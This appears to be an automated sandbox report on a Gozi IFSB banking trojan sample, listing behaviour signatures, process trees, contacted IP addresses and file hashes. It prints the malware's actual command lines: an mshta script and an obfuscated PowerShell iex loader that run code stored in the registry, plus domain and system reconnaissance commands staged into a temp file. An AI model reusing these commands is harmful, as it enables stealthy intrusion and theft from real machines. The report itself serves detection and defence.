Malware Analysis Report

2024-10-19 01:08

Sample ID 220809-pv673scac9
Target f9d778ad3bfea174401f36a2d88851d8
SHA256 44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

Threat Level: Known bad

The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Discovers systems in the same network

Gathers system information

Runs net.exe

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-09 12:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-09 12:40

Reported

2022-08-09 12:42

Platform

win7-20220718-en

Max time kernel

42s

Max time network

46s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1968 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (7 events)

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

Network

N/A

Files

memory/1956-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp

memory/1968-55-0x0000000000000000-mapping.dmp

memory/1968-56-0x00000000756B1000-0x00000000756B3000-memory.dmp

memory/1968-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1968-62-0x00000000002B0000-0x00000000002BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-09 12:40

Reported

2022-08-09 12:42

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

146s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1436 set thread context of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 60 set thread context of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 60 set thread context of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A (2 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 events)
N/A N/A C:\Windows\Explorer.EXE N/A (60 events)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A (5 events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3196 wrote to memory of 4288 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (3 events)
PID 4152 wrote to memory of 1436 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 events)
PID 1436 wrote to memory of 1972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (2 events)
PID 1972 wrote to memory of 4832 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (2 events)
PID 1436 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (2 events)
PID 2916 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (2 events)
PID 1436 wrote to memory of 60 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE (4 events)
PID 60 wrote to memory of 3524 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe (4 events)
PID 60 wrote to memory of 3812 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe (4 events)
PID 60 wrote to memory of 1768 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe (4 events)
PID 60 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe (4 events)
PID 60 wrote to memory of 1468 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe (4 events)
PID 1468 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe (2 events)
PID 1468 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com (2 events)
PID 60 wrote to memory of 3584 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe (2 events)
PID 60 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 60 wrote to memory of 4272 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 4272 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe (2 events)
PID 60 wrote to memory of 344 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 60 wrote to memory of 4248 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 4248 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe (2 events)
PID 60 wrote to memory of 3504 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 60 wrote to memory of 3968 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe (2 events)
PID 3968 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe (2 events)
PID 60 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxyr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxyr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nyjpos -value gp; new-alias -name jbusogjixu -value iex; jbusogjixu ([System.Text.Encoding]::ASCII.GetString((nyjpos "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF666.tmp" "c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF750.tmp" "c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\BA64.bin1 > C:\Users\Admin\AppData\Local\Temp\BA64.bin & del C:\Users\Admin\AppData\Local\Temp\BA64.bin1"

Network

Country Destination Domain Proto
US 93.184.220.29:80 N/A tcp
FR 2.18.109.224:443 N/A tcp
NL 20.50.201.200:443 N/A tcp
US 93.184.221.240:80 N/A tcp (3 events)
US 13.107.42.16:80 config.edge.skype.com tcp
NL 79.110.52.8:80 79.110.52.8 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
NL 79.110.52.82:80 79.110.52.82 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files


memory/1016-210-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 8ce44843ae5914e2603ecb50fcff59b4
SHA1 3a6345d9566cc174526e7d020d1fa1ff8ac15c3c
SHA256 fd4ac27dff473a9e653bc7bbc84b18df090aa273c1f3dd2df4d54eb3b3b84dfd
SHA512 048870ef115f646580ae68b920d998e59d0ff3ec59a7f84ee167c5314185687fa526524d0b936c40a38b40645c97f42188e699a1bf7368852b3bb2ee4d5395be

memory/484-212-0x0000000000000000-mapping.dmp

memory/700-213-0x0000000000000000-mapping.dmp

memory/3620-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 756f9aa8d75fee36e04299538a327de3
SHA1 911b62a984eb4c4190032a0148c11a24a52b56f9
SHA256 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4
SHA512 fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964

memory/4168-216-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 756f9aa8d75fee36e04299538a327de3
SHA1 911b62a984eb4c4190032a0148c11a24a52b56f9
SHA256 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4
SHA512 fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964

memory/2380-218-0x0000000000000000-mapping.dmp

memory/4772-219-0x0000000000000000-mapping.dmp

memory/3196-220-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 5683e4c5651bbe4e85f320aa8263cccc
SHA1 23cc43ab8666c3db6c020a2469ad854224fe0e43
SHA256 9e4d2a8b5c57d9aad2e9ba9f9d49d2400e122cfdebe92b453d48acc4246651e9
SHA512 c7d026d873638b97262445a6d02d91c58673f0c97c029d80e4255fe961f02f04b801adf5e1fdb60ef914cf8bc8a339cbbe1cc01c6ab9b6e00223b58480f5149f

memory/2428-222-0x0000000000000000-mapping.dmp

memory/1108-223-0x0000000000000000-mapping.dmp

memory/4624-224-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 7e9b3b34ec9630f8cb76351e7f0a3e94
SHA1 31ee51742956b7e6a4bc6102332afb5f89e0badf
SHA256 4632bf2a753cd858029a524ddd0ec3a7dc9935c1b7bce81dee3eb781e1aa3091
SHA512 0ca1acea89380f81a200fd8702572887efbd684cb55b8c35343083b13fd0044c908d7f674e0d024a53b4f61be8c00fa93891ab638c81d3c1dafeed8efeb26102

memory/2172-226-0x0000000000000000-mapping.dmp

memory/224-227-0x0000000000000000-mapping.dmp

memory/1932-228-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 ab5ad908b9a63b1f754a9f541f63ab92
SHA1 0d241c8e8cab134e28fec06e57ee6d9886aac4cc
SHA256 4a586dd458d25210bbe2e370a231e9a314fb05a7032d71531b2c74fc0c3eeac8
SHA512 15d4d87ac03a8f45c67c10f09ae0652260f4781047e43fa37d52a3366b60423527ba50c0b25dd637696ec7f00eead1de69f87733478c6520cd7b9c0c02475ebd

memory/1540-230-0x0000000000000000-mapping.dmp

memory/3184-231-0x0000000000000000-mapping.dmp

memory/3080-232-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\BA64.bin1

MD5 09ecf16c7381965a345043970bfe3fe4
SHA1 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb
SHA256 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673
SHA512 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b

C:\Users\Admin\AppData\Local\Temp\BA64.bin

MD5 09ecf16c7381965a345043970bfe3fe4
SHA1 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb
SHA256 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673
SHA512 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b